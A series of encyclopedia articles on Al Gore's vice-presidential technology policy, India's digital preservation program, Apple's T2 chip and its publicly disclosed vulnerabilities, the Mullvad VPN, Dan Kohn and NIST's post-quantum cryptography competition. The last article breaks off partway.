prior in his May 1993 article for Scientific American, "Gigabit Gestalt: Clinton and Gore embrace an activist technology policy." Stix described them as a "distinct statement about where the new administration stands on the matter of technology ... gone is the ambivalence or outright hostility toward government involvement in little beyond basic science." Campbell-Kelly and Aspray further note in Computer: A History of the Information Machine: In the early 1990s the Internet was big news. ... In the fall of 1990 there were just 313,000 computers on the Internet; by 1996, there were close to 10 million. The networking idea became politicized during the 1992 Clinton-Gore election campaign, where the rhetoric of the Information Superhighway|information highway captured the public imagination. On taking office in 1993, the new administration set in place a range of government initiatives for a National Information Infrastructure aimed at ensuring that all American citizens ultimately gain access to the new networks. These initiatives were discussed in a number of venues. Howard Rheingold argued in The Virtual Community: Homesteading on the Electronic Frontier, that these initiatives played a critical role in the development of digital technology, stating that, "Two powerful forces drove the rapid emergence of the superhighway notion in 1994 ... the second driving force behind the superhighway idea continued to be Vice-President Gore." In addition, Clinton and Gore submitted the report, Science in the National Interest in 1994, which further outlined their plans to develop science and technology in the United States. Gore also discussed these plans in speeches that he made at The Superhighway Summit at UCLA and for the International Telecommunications Union. On January 13, 1994 Gore "became the first U.S. vice president to hold a live interactive news conference on an international computer network". Gore was also asked to write the foreword to the 1994 internet guide, The Internet Companion: A Beginner's Guide to Global Networking (2nd edition) by Tracy LaQuey. In the foreword he stated the following: Since I first became interested in high-speed networking almost seventeen years ago, there have been many major advances both in the technology and in public awareness. Articles on high-speed networks are commonplace in major newspapers and in news magazines. In contrast, when as a House member in the early 1980s, I called for creation of a national network of "information superhighways," the only people interested were the manufacturers of optical fiber. Back then, of course, high-speed meant 56,000 bits per second. Today we are building a national information infrastructure that will carry billions of bits of data per second, serve thousands of users simultaneously, and transmit not only electronic mail and data files but voice and video as well. The Clinton-Gore administration launched the first official White House website on October 21, 1994. It would be followed by three more versions, resulting in the final edition launched in 2000. The White House website was part of a general movement by this administration towards web based communication: "Clinton and Gore were responsible for pressing almost all federal agencies, the U.S. court system and the U.S. military onto the Internet, thus opening up America's government to more of America's citizens than ever before. On July 17, 1996. President Clinton issued Executive Order 13011 - Federal Information Technology, ordering the heads of all federal agencies to fully utilize information technology to make the information of the agency easily accessible to the public." Clipper Chip The Clipper Chip, which "Clinton inherited from a multi-year National Security Agency effort," was a method of hardware encryption with a government backdoor. In 1994, Vice President Gore issued a memo on the topic of encryption which stated that under a new policy the White House would "provide better encryption to individuals and businesses while ensuring that the needs of law enforcement and national security are met. Encryption is a law and order issue since it can be used by criminals to thwart wiretaps and avoid detection and prosecution." Another initiative proposed a software-based key escrow system, in which keys to all encrypted data and communications would reside with a trusted third party. Since the government was seen as possibly having a need to access encrypted data originating in other countries, the pressure to establish such a system was worldwide. These policies met with strong opposition from civil liberty groups such as the American Civil Liberties Union and the Electronic Privacy Information Center, scientific groups such as the National Research Council, leading cryptographers, and the European Commission. All three Clipper Chip initiatives thus failed to gain widespread acceptance by consumers or support from the industry. The ability of a proposal such as the Clipper Chip to meet the stated goals, especially that of enabling better encryption to individuals, was disputed by a number of experts. By 1996, the Clipper Chip was abandoned. Additional projects Gore had discussed his concerns with computer technology and levels of access in his 1994 article, "No More Information Have and Have Nots." He was particularly interested in implementing measures which would grant all children access to the Internet, stating: Gore had a chance to fulfill this promise when he and President Clinton participated in John Gage's NetDay'96 on March 9, 1996. Clinton and Gore spent the day at Ygnacio Valley High School, as part of the drive to connect California public schools to the Internet. In a speech given at YVH, Clinton stated that he was excited to see that his challenge the previous September to "Californians to connect at least 20 percent of your schools to the Information Superhighway by the end of this school year" was met. Clinton also described this event as part of a time of "absolutely astonishing transformation; a moment of great possibility. All of you know that the information and technology explosion will offer to you and to the young people of the future more opportunities and challenges than any generation of Americans has ever seen." In a prepared statement, Gore added that NetDay was part of one of the major goals of the Clinton administration, which was "to give every child in America access to high quality educational technology by the dawn of the new century." Gore also stated that the administration planned "to connect every classroom to the Internet by the year 2000." On April 28, 1998, Gore honored numerous volunteers who had been involved with NetDay and "who helped connect students to the Internet in 700 of the poorest schools in the country" via "an interactive online session with children across the country." He also reinforced the impact of the Internet on the environment, education, and increased communication between people through his involvement with "the largest one-day online event" for that time, 24 Hours in Cyberspace. The event took place on February 8, 1996 and Second Lady Tipper Gore also participated, acting as one of the event's 150 photographers. Gore contributed the introductory essay to the Earthwatch section of the website, arguing that: {{quote|The Internet and other new information technologies cannot turn back the ecological clock, of course. But they can help environmental scientists push back the frontiers of knowledge and help ordinary citizens grasp the urgency of preserving our natural world ... But more than delivering information to scientists, equipping citizens with new tools to improve their world and making offices cheaper and more efficient, Cyberspace is achieving something even more enduring and profound: It's changing the very way we think. It is extending our reach, and that is transforming our grasp.<ref>[http://undertow.arch.gatech.edu/Homepages/virtualopera/cyber24/SITE/essay/gore.htm Vice President Al Gore's introduction to Earthwatch: 24 Hours In Cyberspace] </ref>}} Gore was involved in a number of other projects related to digital technology. He expressed his concerns for online privacy through his 1998 "Electronic Bill of Rights" speech in which he stated: "We need an electronic bill of rights for this electronic age ... You should have the right to choose whether your personal information is disclosed." He also began promoting a NASA satellite that would provide a constant view of Earth, marking the first time such an image would have been made since The Blue Marble photo from the 1972 Apollo 17 mission. The "Triana" satellite would have been permanently mounted in the L1 Lagrangian Point, 1.5 million km away. Gore also became associated with Digital Earth. Environment Gore was also involved in a number of initiatives related to the environment. He launched the GLOBE program on Earth Day'94, an education and science activity that, according to Forbes magazine, "made extensive use of the Internet to increase student awareness of their environment". During the late 1990s, Gore strongly pushed for the passage of the Kyoto Protocol, which called for reduction in greenhouse gas emissions. Gore was opposed by the Senate, which passed unanimously (95-0) the Byrd–Hagel Resolution (S. Res. 98). In 1998, Gore began promoting a NASA satellite that would provide a constant view of Earth, marking the first time such an image would have been made since The Blue Marble photo from the 1972 Apollo 17 mission. During this time, he also became associated with Digital Earth. Fund-raising In 1996, Gore was criticized for attending an event at the Buddhist Hsi Lai Temple in Hacienda Heights, California. In an interview on NBC's Today the following year, he stated that, "I did not know that it was a fund-raiser. I knew it was a political event, and I knew there were finance people that were going to be present, and so that alone should have told me, 'This is inappropriate and this is a mistake; don't do this.' And I take responsibility for that. It was a mistake." The temple was later implicated in a campaign donation laundering scheme. In that scheme, donations nominally from Buddhist nuns in lawful amounts had actually been donated by wealthy monastics and devotees. Robert Conrad, Jr., then head of a Justice Department task force appointed by Attorney General Janet Reno to investigate the fund-raising controversies, called on Reno in Spring 2000 to appoint an independent counsel to look into the fund-raising practices of Vice President Gore. Reno on September 3, 1997, ordered a review of Gore's fund-raising and associated statements. Based on the investigation, she judged that appointment of an independent counsel was unwarranted. Later in 1997, Gore also had to explain certain fund-raising calls he made to solicit funds for the Democratic Party for the 1996 election. In a news conference, Gore responded that, "all calls that I made were charged to the Democratic National Committee. I was advised there was nothing wrong with that. My counsel tells me there is no controlling legal authority that says that is any violation of any law." The phrase "no controlling legal authority" was severely criticized by some commentators, such as Charles Krauthammer, who wrote that "Whatever other legacies Al Gore leaves behind between now and retirement, he forever bequeaths this newest weasel word to the lexicon of American political corruption." On the other hand, Robert L. Weinberg argued in The Nation'' in 2000 that Gore actually had the U.S. Constitution in his favor on this, although he did concede that Gore's "use of the phrase was judged by many commentators to have been a political mistake of the first order" and noted that it was used often in stump speeches by George W. Bush when Bush was campaigning against Gore in that year's presidential race. Impeachment and impact Soon afterwards, Gore contended with the Lewinsky scandal, involving an affair between President Clinton and an intern, Monica Lewinsky. Gore initially defended Clinton, whom he believed to be innocent, stating, "He is the president of the country! He is my friend ... I want to ask you now, every single one of you, to join me in supporting him." After Clinton was impeached Gore continued to defend him stating, "I've defined my job in exactly the same way for six years now ... to do everything I can to help him be the best president possible." However, by the beginning stages of the 2000 presidential election, Gore gradually distanced himself from Clinton. Clinton was not a part of Gore's campaign, a move also signaled by the choice of Joe Lieberman as a running mate, as Lieberman had been highly critical of Clinton's conduct. Notes External links Official VP website with initiatives Albert A. Gore, Jr., 45th Vice President (1993-2001) Biography of the Honorable Al Gore Vice Presidency Presidency of Bill Clinton Gore
56030641
https://en.wikipedia.org/wiki/National%20Digital%20Preservation%20Program
National Digital Preservation Program
Keeping the foresight of rapidly changing technologies and rampant digital obsolescence, in 2008, the R & D in IT Group, Ministry of Electronics and Information Technology, Government of India envisaged to evolve Indian digital preservation initiative. In order to learn from the experience of developed nations, during March 24–25, 2009, an Indo-US Workshop on International Trends in Digital Preservation was organized by C-DAC, Pune with sponsorship from Indo-US Science & Technology Forum, which lead to more constructive developments towards formulation of the national program. National Study Report on Digital Preservation Requirements of India During April 2010, Ministry of Electronics and Information Technology, Government of India entrusted the responsibility of preparing National Study Report on Digital Preservation Requirements of India with Human-Centred Design & Computing Group, C-DAC, Pune, which was already active in the thematic area of heritage computing. The objective of this project was to present a comprehensive study of current situation in India versus the international trends of digital preservation along with the recommendations for undertaking the National Digital Preservation Program by involving all stakeholder organizations. Technical experts from around 24 organizations representing diverse domains such as e-governance, government and state archives, audio, video and film archives, cultural heritage repositories, health, science and education, insurance and banking, law, etc. were included in the national expert group. Major institutions represented in the expert group were Centre for Development of Advance Computing (C-DAC), National Informatics Centre (NIC), Unique Identity Program, National Archives of India, National Film Archive of India, Indira Gandhi National Centre for the Arts, Information and Broadcasting (Doordarshan and All India Radio), National Remote Sensing Center (NRSC) / ISRO, Controller of Certifying Authorities (CCA), National e-Governance Division (NeGD), Life Insurance Corporation, Reserve Bank of India (RBI), National Institute of Oceanography (NIO), Indian Institute of Public Administration, Defense Scientific Information & Documentation Centre (DSIDC) and several other organizations. The expert group members were asked to submit position papers highlighting the short term and long-term plans for digital preservation with respect to their domain. The study report was presented before Government of India in two volumes as under - Volume –I Recommendations for National Digital Preservation Program of India Volume-II Position Papers by the National Expert Group Members The report included an overview of international digital preservation projects, study of legal imperatives (Information Technology ACT 2000/2008), study of technical challenges and standards, consolidated recommendations given by the national expert group for the National Digital Preservation Program. One of the key recommendations given in this report was to harmonize Public Records Act, Right to Information Act, Indian Evidence Act, Copyright Act and other related Acts with the Information Technology Act in order to address the digital preservation needs. The foresight of this recommendation has proved right, as in 2018, the Indian judiciary has initiated the drafting of electronic evidence rules to be introduced under the Indian Evidence Act. In this context, the Joint Committee of High Court Judges visited C-DAC, Pune on 10 March 2018 to examine the technical aspects of the proposed electronic evidence rules in terms of extraction, encryption, preservation, retrieval and authentication of e-evidence in the court of law. Centre of Excellence for Digital Preservation As recommended in the national study report, during April 2011, Centre of Excellence for Digital Preservation was launched as the flagship project under the National Digital Preservation Program, funded by Ministry of Electronics and Information Technology, Government of India. The project was awarded to Human-Centred Design & Computing Group, C-DAC Pune, India. The objectives of Centre of Excellence were as under: Conduct research and development in digital preservation to produce the required tools, technologies, guidelines and best practices. Develop the pilot digital preservation repositories and provide help in nurturing the network of Trustworthy Digital Repositories (National Digital Preservation Infrastructure) as a long-term goal Define the digital preservation standards by involving the experts from stakeholder organizations, consolidate and disseminate the digital preservation best practices generated through various projects under National Digital Preservation Program, being the nodal point for pan-India digital preservation initiatives. Provide inputs to Ministry of Electronics & Information Technology in the formation of National Digital Preservation Policy Spread awareness about the potential threats and risks due to digital obsolescence and the digital preservation best practices. The major outcomes of this project are briefly summarised hereafter. Digital Preservation Standard and Guidelines Digital preservation standard and guidelines are developed in order to help local data intensive projects in preparing for highly demanding standards such as ISO 16363 for Audit and Certification of Trusted Digital Repositories. The standard is duly notified by Ministry of Electronics and Information Technology, Government of India Vide Notification No. 1(2)/2010-EG-II dated December 13, 2013 for all e-governance applications in India. e-Governance standard for Preservation Information Documentation (eGOV-PID) of Electronic Records The eGOV-PID provides standard metadata dictionary and schema for automatically capturing the preservation metadata in terms of cataloging information, enclosure information, provenance information, fixity information, representation information, digital signature information and access rights information immediately after an electronic record is produced by e-governance system. It helps in producing an acceptable Submission Information Package (SIP) for an Open Archival Information System (OAIS) ISO 14721:2012. Best practices and guidelines for Production of Preservable e-Records Best practices and guidelines introduce 5 distinct steps of e-record management namely e-record creation, e-record capturing, e-record keeping, e-record transfer to trusted digital repository and e-record preservation which need to be adopted in all e-governance projects. It also specifies the open source and standard based file formats for the production of e-records. The guidelines incorporate the Electronic Records Management practice as per the ISO/TR 15489-1 and 2 Information and Documentation - Records Management. Digital Preservation Tools and Solutions However, it is difficult to implement the digital preservation standard due to unavailability required tools and solutions. Therefore, the standard and guidelines are supported with a variety of digital preservation tools and solutions which can be given to the memory institutions and records creating organizations for long term preservation. The project team at C-DAC Pune has developed a software framework for digital archiving named as DIGITĀLAYA (डिजिटालय in Hindi language) which is customizable for various domains, data types and application contexts such as E-records management & archival (a variety of born digital records produced by organizations on day-to-day basis) Large volume of e-governance records Audiovisual archives Digital libraries / document archives DIGITĀLAYA (डिजिटालय) is designed and developed as per the CCSDS Open Archival Information System (OAIS) Reference Model, ISO 14721: 2012. A number of digital preservation tools are developed to help in processing the digital data e-SANGRAHAN (ई-संग्रहण): E-acquisition tool e-RUPĀNTAR (ई-रूपांतर): Pre-archival data processing tool DATĀNTAR (डेटांतर): E-records extraction tool SUCHI SAMEKAN (सूची समेकन): Metadata importing and aggregation tool META-PARIVARTAN (मेटा-परिवर्तन): Any to any metadata conversion tool DATA HASTĀNTAR (डेटा-हस्तांतर): Data encryption and transfer tool PDF/A converter tool All the archival systems and digital preservation tools are developed in such a way that they enable in producing evidences / reports as required for the audit and certification of trustworthy digital repositories. Pilot Digital Repositories In order to test and demonstrate the effectiveness of digital preservation tools, various pilot digital repositories were developed in collaboration with domain institutions such as Indira Gandhi National Centre for Arts; New Delhi; National Archives of India, New Delhi; Stamps and registration Department, Hyderabad; and e-District. C-DAC Noida developed the pilot digital repository for e-Court in collaboration with district courts of Delhi using e-Goshwara: e-Court Solution. The pilot digital repositories were selected from different domains with following objectives: Understand different data sets in terms of metadata, digital objects, file formats, authenticity, access control and requirements of designated users Identify opportunities for development of tools and solutions in order to address domain specific requirements Involve the stakeholders in digital preservation process Generate proof of concept by deploying the solutions in the domain institutions ISO 16363 Certified Trusted Digital Repository As a part of the pilot digital repositories, National Cultural Audiovisual Archive (NCAA) at IGNCA, New Delhi is established using DIGITĀLAYA (डिजिटालय). NCAA manages around 2 Petabytes of rare cultural audiovisual data. During June 2017, Primary Trustworthy Digital Repository Authorization Body (PTAB), UK got accredited by National Accreditation Board for Certification Bodies (NABCB), New Delhi, India. PTAB was involved to audit National Cultural Audiovisual Archive. Both NCAA and C-DAC teams worked together during the audit process. Finally, NCAA has been awarded the certified status as Trusted Digital Repository on 27 November 2017, as per ISO 16363. It happens to be the first Certified Trusted Digital Repository (Certificate No. PTAB-TDRMS 0001) as per ISO 16363 in India and world. Capacity Building for Audit and Certification The High Level 3-day Training Course on ISO 16363 for Auditors and Managers of Digital Repositories was conducted during 11–13 January 2017 at India Habitat Centre, New Delhi, India. This training was organized as per the deliverable of Centre of Excellence for Digital Preservation by C-DAC Pune in collaboration with Primary Trustworthy Digital Repository Authorization Body (PTAB), UK. This initiative was helpful in formally introducing the ISO 16363 and ISO 16919 through the National Accreditation Board for Certification Bodies (NABCB) for the audit and certification of Indian digital repositories. The first batch of potential technical auditors was trained which included 27 Participants from various stakeholder organisations. Apart from this, numerous digital preservation and DIGITĀLAYA (डिजिटालय) training sessions were organised for the staff of NAI, IGNCA and the 21 partner institutions contributing in NCAA project. Contribution to UNESCO Standard Setting Instrument on Preservation of Digital Heritage The Principal Investigator of Centre of Excellence for Digital Preservation, Dr. Dinesh Katre represented India in the UNESCO International Experts Consultative Meet on Preservation and Access during June 25–26, 2014 at Warsaw, Poland, which drafted the Standard Setting Instrument for the protection and preservation of the digital heritage. General Conference of UNESCO at its 38th session on 1 and 2 July 2015 unanimously adopted the Recommendation Safeguarding the Memory of the World –Preservation of, Access to, Documentary Heritage in the Digital Era (38 C/Resolutions – Annex V). Based on the experience gained from this project, Government of India is considering to create a national policy on digital preservation which will be instrumental in establishing national digital preservation infrastructure. The digital preservation initiative stands at the crux where it is crucial to fill up the gap between the Digital India and the challenges posed by rampant technological obsolescence, to make it a truly sustainable vision. See also National Digital Information Infrastructure and Preservation Program (NDIIPP), USA Internet Archive, USA Wayback Machine Internet Memory Foundation Digital Curation Centre, UK Digital Preservation Coalition (DPC), UK Trustworthy Repositories Audit & Certification Big Data References Digital preservation Archival science Information technology in India
56049249
https://en.wikipedia.org/wiki/Apple%20T2
Apple T2
The Apple T2 (Apple's internal name is T8012) security chip is a system on a chip "SoC" tasked with providing security and controller features to Apple's Intel based Macintosh computers. It is a 64-bit ARMv8 chip and runs bridgeOS 2.0. T2 has its own RAM and is essentially a computer of its own, running in parallel to the main computer that the user interacts with. Design The main application processor in T2 is a variant of the Apple A10, which is a 64-bit ARMv8.1-A based CPU. It is manufactured by TSMC on their 16 nm process, just as the A10. Analysis of the die reveals a nearly identical CPU macro as the A10 which reveals a four core design for its main application processor, with two large high performance cores, "Hurricane", and two smaller efficiency cores, "Zephyr". Analysis also reveals the same amount of RAM controllers, but a much reduced GPU facility; three blocks, only a quarter the size compared to A10. The die measures 9.6 × 10.8 mm, a die size of 104 mm2, which amounts to about 80% of the size of the A10. As it serves as a co-processor to its Intel based host, it also consists of several facilities handling a variety of functions not present in the host system's main platform. It is designed to stay active even though the main computer is in a halted low power mode. The main application processor in T2 is running an operating system called bridgeOS. The secondary processor in T2 is an 32-bit ARMv7-A based CPU called Secure Enclave Processor (SEP) which has the task of generating and storing encryption keys. It is running an operating system called "sepOS" based on the L4 microkernel. The T2 module is built as a package on a package (PoP) together with its own 2 GB LP-DDR4 RAM in the case of iMac Pro or 1 GB in the case of MacBook Pro 15" early 2019. The T2 communicates with the host via a USB-attached Ethernet port. Security features There are numerous features regarding security. The SEP is used for handling and storing encrypted keys, including keys for Face ID, FileVault, macOS Keychain and UEFI firmware passwords. And it also stores the machine's unique ID (UID) and group ID (GID). An AES Crypto Engine implementing AES-256 and a hardware random number generator. A Public Key Accelerator is used to perform asymmetric cryptography operations like RSA and elliptic-curve cryptography. storage controller for the computer's solid-state drive, including always on, on the fly encryption and decryption of data to and from it. Controllers for microphones, camera, ambient light sensors and Touch ID, decoupling the main operating system's access to those. The T2 is integral in securing powering up and the boot sequence and upgrading of operating systems, not allowing unsigned components to interfere. Other features There are other facilities present not directly associated with security. Image coprocessor enabling accelerated image processing and quality enhancements such as color, exposure balance, and focus for the iMac Pro's FaceTime HD camera. Video codec enabling accelerated encoding and decoding of h.264 and h.265. Controller for a touchscreen, implemented as the TouchBar in portable Macintosh computers. Speech recognition used in the "Hey Siri" feature. Monitoring and controlling of the machine state, including a system diagnose server and thermals management. Speaker controller. History The Apple T2 was first released in the iMac Pro 2017. On July 12, 2018, Apple released an updated MacBook Pro that includes the T2 chip, which among other things enables the "Hey Siri" feature. On November 7, 2018, Apple released an updated Mac mini and MacBook Air with the T2 chip. On August 4, 2020, a refresh of the 5K iMac was announced, including the T2 chip. The functionality of the T2 is incorporated in the M series Apple silicon CPUs that Apple is transitioning to instead of Intel processors. Security vulnerabilities In October 2019 security researchers began to theorize that the T2 might also be affected by the checkm8 bug as it was roughly based on the A10 design from 2016 in the original iMac Pro. Rick Mark then ported libimobiledevice to work with the Apple T2 providing a free and open source solution to restoring the T2 outside of Apple Configurator and enabling further work on the T2. On March 6, 2020 a team of engineers dubbed T2 Development Team exploited the existing checkm8 bug in the T2 and released the hash of a dump of the secure ROM as a proof of entry. The checkra1n team quickly integrated the patches required to support jailbreaking the T2. The T2 Development Team then used Apple's undocumented vendor-defined messages over USB power delivery to be able to put a T2 device into Device Firmware Upgrade mode without user interaction. This compounded the issue making it possible for any malicious device to jailbreak the T2 without any interaction from a custom charging device. Later in the year the release of the blackbird SEP vulnerability further compounded the impact of the defect by allowing arbitrary code execute in the T2 Secure Enclave Processor. This had the impact of potentially affecting encrypted credentials such as the FileVault keys as well as other secure Apple Keychain items. Developer Rick Mark then determined that macOS could be installed over the same iDevice recovery protocols, which later ended up true of the M1 series of Apple Macs. On September 10, 2020 a public release of checkra1n was published that allowed users to jailbreak the T2. The T2 Development Team created patches to remove signature validation from files on the T2 such as the MacEFI as well as the boot sound. Members of the T2 Development Team begin answering questions in industry slack instances. A member of the security community from IronPeak used this data to compile an impact analysis of the defect, which was later corrected to correctly attribute the original researchers The original researchers made multiple corrections to the press that covered the IronPeak blog. In October 2020, a hardware flaw in the chip's security features was found that might be exploited in a way that cannot be patched, using a similar method as the jailbreaking of the iPhone with A10 chip, since the T2 chip is based on the A10 chip. Apple was notified of this vulnerability but did not respond before security researchers publicly disclosed the vulnerability. It was later demonstrated that this vulnerability can allow users to implement custom Mac startup sounds. Products that include the Apple T2 iMac Pro 2017 iMac 27-inch (mid-2020) MacBook Pro (13-inch, 2018,Four Thunderbolt 3 ports) MacBook Pro (15-inch, 2018) Mac mini (2018) MacBook Air (2018) MacBook Pro (15-inch, 2019) MacBook Pro (13-inch, 2019) MacBook Pro (13-inch, Early 2020) MacBook Air (2019) MacBook Pro (16-inch, 2019) Mac Pro (2019) MacBook Air (Early 2020) See also Apple silicon, range of ARM-based processors designed by Apple for their products Apple A10 bridgeOS References T2 ARM architecture
56112003
https://en.wikipedia.org/wiki/Mullvad
Mullvad
Mullvad is an open-source commercial VPN service based in Sweden. Launched in March 2009, Mullvad operates using the WireGuard and OpenVPN protocols. Mullvad accepts Bitcoin and Bitcoin Cash for subscriptions in addition to conventional payment methods. Its name is Swedish for mole. History Mullvad was launched in March 2009 by Amagicom AB. Mullvad began supporting connections via the OpenVPN protocol in 2009. Mullvad was an early adopter and supporter of the WireGuard protocol, announcing the availability of the new VPN protocol in March 2017 and making a "generous donation" supporting WireGuard development between July and December 2017. In October 2019, Mullvad partnered with Mozilla. Mozilla's VPN service, Mozilla VPN, utilizes Mullvad's WireGuard servers. In April 2020, Mullvad partnered with Malwarebytes and provides WireGuard servers for their VPN service, Malwarebytes Privacy. Service , Mullvad's server list showed information for 766 server locations across 37 countries (61 cities). A TechRadar review notes that "Mullvad's core service is powerful, up-to-date, and absolutely stuffed with high-end technologies." Complementing its use of the open-source OpenVPN and WireGuard protocols, Mullvad includes "industrial strength" encryption (employing AES-256 GCM methodology), 4096-bit RSA certificates with SHA-512 for server authentication, perfect forward secrecy, "multiple layers" of DNS leak protection, IPv6 leak protection, "multiple stealth options" to help bypass government or corporate VPN blocking, and built in support for port forwarding. Mullvad provides VPN client applications for computers running under Windows, macOS and Linux operating systems. , native iOS and Android Mullvad VPN clients using the WireGuard protocol are available. iOS and Android mobile operating system users can also configure and use built-in VPN clients or the OpenVPN or WireGuard apps to access Mullvad's service. Privacy No email address or other identifying information is requested during Mullvad's registration process. Rather, a unique 16-digit account number is anonymously generated for each new user. This account number is henceforth used to log in to the Mullvad service. To help ensure the privacy of its users, Mullvad accepts the anonymous payment methods of cash, Bitcoin and Bitcoin Cash. (Payment for the service can also be made via bank wire transfer, credit card, PayPal, and Swish). For users of its VPN service, Mullvad's no-logging policy precludes logging of: the user's IP address, the VPN IP address used, browsing activity, bandwidth, connections, session duration, timestamps, and DNS requests. The TechRadar review notes that "The end result of all this is you don't have to worry about how Mullvad handles court requests to access your usage data, because, well, there isn't any." Reception While Mullvad has been noted for taking a strong approach to privacy and maintaining good connection speeds, the VPN client setup and interface has been noted as being more onerous and technically involved than some other VPN providers especially on some client platforms. However, a follow-up review by the same source in October 2018 notes, "Mullvad has a much improved, modern Windows client (and one for Mac, too)." A PC World review, also from October 2018, concludes, "With its commitment to privacy, anonymity (as close as you can realistically get online), and performance Mullvad remains our top recommendation for a VPN service." In November 2018, TechRadar noted Mullvad as one of five VPN providers to answer to a set of trustworthiness questions posed by the Center for Democracy and Technology. In March 2019, a TechRadar review noted slightly substandard speeds. However, a more recent and more thorough TechRadar review dated June 11, 2019 stated that "speeds are excellent." While the latter review notes a shortcoming for mobile users in that Mullvad provided no mobile VPN client apps, there is now a mobile app for both Android and iOS available. The non-profit Freedom of the Press Foundation, in their "Choosing a VPN” guide, lists Mullvad amongst the four VPNs that meet their recommended settings and features for VPN use as a tool for protecting online activity. The non-profit organization PrivacyTools.io has developed a comprehensive list of VPN Provider Criteria in order to objectively recommend VPNs. , only five VPNs had fulfilled those criteria. Mullvad is one of those five recommended VPN services. See also Comparison of virtual private network services References External links Source code on GitHub Internet privacy Virtual private network services Free and open-source software
56155763
https://en.wikipedia.org/wiki/Dan%20Kohn
Dan Kohn
Dan Kohn (November 20, 1972November 1, 2020) was an American serial entrepreneur and nonprofit executive who led the Linux Foundation's Public Health initiative. He was the executive director at Cloud Native Computing Foundation (CNCF), which sustains and integrates open source cloud software including Kubernetes and Fluentd, through 2020. The first company he founded, NetMarket, conducted the first secure commercial transaction on the web in 1994. Early life and education Kohn was born in Philadelphia on November 20, 1972. He studied at Phillips Exeter Academy, and graduated with a bachelor's degree from Swarthmore College in 1994. Career NetMarket Kohn co-founded and was CEO of NetMarket, an online marketplace. On August 11, 1994, NetMarket sold Ten Summoner's Tales, a CD by Sting, to Phil Brandenberger of Philadelphia using a credit card over the Internet. The New York Times described this as "...the first retail transaction on the Internet using a readily available version of powerful data encryption software designed to guarantee privacy." The encryption used in the transaction was provided by the Pretty Good Privacy (PGP) program, incorporated into the X Mosaic browser. Other work Kohn worked as chief technology officer at Spreemo, a healthcare marketplace, and at Shopbeam, a shoppable ads startup. Earlier, he worked as vice president at Teledesic, the satellite-based Internet provider funded by Craig McCaw and Bill Gates and then became a general partner at Skymoon Ventures. Kohn co-authored RFC 3023, XML Media Types, which defined how XML and MIME interoperate and is the origin of the widely used +suffix in MIME types. He also contributed two chapters to The Bogleheads' Guide to Retirement Planning. The Linux Foundation and CNCF As executive director of CNCF, Kohn helped expand CNCF membership to include the largest public cloud and enterprise software companies. He led the efforts to create a conformance standard for Kubernetes and a Kubernetes certified service provider program in 2017. During Kohn's tenure at CNCF, he oversaw the growth of KubeCon (the foundation's primary event) from 500 attendees in 2015 to over 12,000 at the KubeCon + CloudNativeCon North America 2019 in San Diego, California. Kohn was chief operating officer of the Linux Foundation and helped launch the Linux Foundation's Core Infrastructure Initiative, a project created after Heartbleed to fund and support free and open-source software projects that are critical to the functioning of the Internet. More recently, he helped create their open source best practices badge. As general manager of LF Public Health, Kohn helped "public health authorities use open source software to fight COVID-19 and other epidemics." Personal life Kohn was married to climate scientist Julie Pullen. Pullen and Kohn had two sons. Death Kohn died of complications from colon cancer in New York City on November 1, 2020, at age 47. References External links Video about the first web transaction, by Shopify, 4 minutes, 10 seconds 1972 births 2020 deaths 20th-century American businesspeople 21st-century American businesspeople American business executives Businesspeople from Philadelphia Deaths from cancer in New York (state) Deaths from colorectal cancer Free software programmers Open source advocates Open source people Phillips Exeter Academy alumni Swarthmore College alumni
56162225
https://en.wikipedia.org/wiki/NIST%20Post-Quantum%20Cryptography%20Standardization
NIST Post-Quantum Cryptography Standardization
Post-Quantum Cryptography Standardization is a program and competition by NIST to update their standards to include post-quantum cryptography. It was announced at PQCrypto 2016. 23 signature schemes and 59 encryption/KEM schemes were submitted by the initial submission deadline at the end of 2017 of which 69 total were deemed complete and proper and participated in the first round. Seven of these, of which 3 are signature schemes, have advanced to the third round, which was announced on July 22, 2020. Background Academic research on the potential impact of quantum computing dates back to at least 2001. A NIST published report from April 2016 cites experts that acknowledge the possibility of quantum technology to render the commonly used RSA algorithm insecure by 2030. As a result, a need to standardize quantum-secure cryptographic primitives was pursued. Since most symmetric primitives are relatively easy to modify in a way that makes them quantum resistant, efforts have focused on public-key cryptography, namely digital signatures and key encapsulation mechanisms. In December 2016 NIST initiated a standardization process by announcing a call for proposals. The competition is now in its third round out of expected four, where in each round some algorithms are discarded and others are studied more closely. NIST hopes to publish the standardization documents by 2024, but may speed up the process if major breakthroughs in quantum computing are made. It is currently undecided whether the future standards be published as FIPS or as NIST Special Publication (SP). Round one Under consideration were: (strikethrough means it had been withdrawn) Round one submissions published attacks Guess Again by Lorenz Panny RVB by Lorenz Panny RaCoSS by Daniel J. Bernstein, Andreas Hülsing, Tanja Lange and Lorenz Panny HK17 by Daniel J. Bernstein and Tanja Lange SRTPI by Bo-Yin Yang WalnutDSA by Ward Beullens and Simon R. Blackburn by Matvei Kotov, Anton Menshov and Alexander Ushakov DRS by Yang Yu and Léo Ducas DAGS by Elise Barelli and Alain Couvreur Edon-K by Matthieu Lequesne and Jean-Pierre Tillich RLCE by Alain Couvreur, Matthieu Lequesne, and Jean-Pierre Tillich Hila5 by Daniel J. Bernstein, Leon Groot Bruinderink, Tanja Lange and Lorenz Panny Giophantus by Ward Beullens, Wouter Castryck and Frederik Vercauteren RankSign by Thomas Debris-Alazard and Jean-Pierre Tillich McNie by Philippe Gaborit; Terry Shue Chien Lau and Chik How Tan Round two Candidates moving on to the second round were announced on January 30, 2019. They are: Round three On July 22, 2020, NIST announced seven finalists ("first track"), as well as eight alternate algorithms ("second track"). The first track contains the algorithms which appear to have the most promise, and will be considered for standardization at the end of the third round. Algorithms in the second track could still become part of the standard, after the third round ends. NIST expects some of the alternate candidates to be considered in a fourth round. NIST also suggests it may re-open the signature category for new schemes proposals in the future. On June 7-9, 2021, NIST conducted the third PQC standardization conference, virtually. The conference included candidates' updates and discussions on implementations, on performances, and on security issues of the candidates. A small amount of focus was spent on intellectual property concerns. Finalists Alternate candidates Intellectual property concerns After NIST's announcement regarding the finalists and the alternate candidates, various intellectual property concerns were voiced, notably surrounding lattice-based schemes such as Kyber and NewHope. NIST holds signed statements from submitting groups clearing any legal claims, but there is still a concern that third parties could raise claims. NIST claims that they will take such considerations into account while picking the winning algorithms. Adaptations During this round, some candidates have shown to be vulnerable to some attack vectors. It forces this candidates to adapt accordingly: CRYSTAL-Kyber and SABER may change the nested hashes used in their proposals in order for their security claims to hold. FALCON side channel attack by . A masking may be added in order to resist the attack. This adaptation affects performance and should be considered while standardizing. See also Advanced Encryption Standard process CAESAR Competition – Competition to design 